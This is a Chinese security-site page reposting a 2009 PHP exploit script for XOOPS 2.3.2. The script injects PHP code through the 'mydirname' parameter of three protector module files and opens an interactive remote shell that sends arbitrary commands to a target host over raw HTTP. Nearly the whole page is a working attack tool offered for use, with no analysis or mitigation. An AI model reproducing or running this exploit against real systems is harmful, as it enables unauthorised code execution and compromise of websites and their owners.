XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit

来源：staker[at]hotmail[dot]it 作者：athos 发布时间：2009-01-09

#!/usr/bin/php -q
<?php

/****************************************************************
* XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    *
* by athos - staker[at]hotmail[dot]it                          *
* http://xoops.org                                             *
*                                                              *
* thanks to s3rg3770 and The:Paradox                           *
*                                                              *
* works with register globals on                               *
* note: this vuln is a remote php code execution               *
*                                                              *
* Directory (xoops_lib/modules/protector/)                     *
* onupdate.php?mydirname=a(){} [PHP CODE] function v           *
* oninstall.php?mydirname=a(){} [PHP CODE] function v          *
* notification.php?mydirname=a(){} [PHP CODE] function v       *
****************************************************************/

error_reporting(0);

list($cli,$host,$path,$num) = $argv;

if ($argc != 4) {

    print "\n+--------------------------------------------------------------+\n";
    print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit    |\n";
    print "\r+--------------------------------------------------------------+\n";
    print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n";
    print "\rUsage: php xpl.php [host] [path]\n\n";
    print "\rhost     + localhost\n";
    print "\rpath     + /XOOPS\n";
    exit;
}

exploit();

function exploit() {

    global $num;

    if ($num > 3) {
       die("\n$num isn't a valid option\n");
    }
    else {
       yeat_shell();
    }
}


function yeat_shell() {

    while (1) {
        echo "yeat[php-shell]~$: ";
        $exec = stripslashes(trim(fgets(STDIN)));

        if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n");
        if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n");
        if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n");

        print data_exec($exec);
    }
}

function data_exec($exec) {

    global $host,$path,$num;

    if ($num == 1) {
        $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}";
    }

    if ($num == 2) {
        $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}";
    }

    if ($num == 3) {
        $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}";
    }

    $exec = urlencode($exec);
    $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n";
    $data .= "Host: {$host}\r\n";
    $data .= "User-Agent: Lynx (textmode)\r\n";
    $data .= "Connection: close\r\n\r\n";

    $html = data_send ($host,$data);

    return $html;
}

function data_send ($host,$data) {

    if (!$sock = @fsockopen($host,80)) {
        die("Connection refused,try again!\n");
    }   fputs($sock,$data);

    while (!feof($sock)) { $html .= fgets($sock); }

    fclose($sock);
    return $html;
}

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告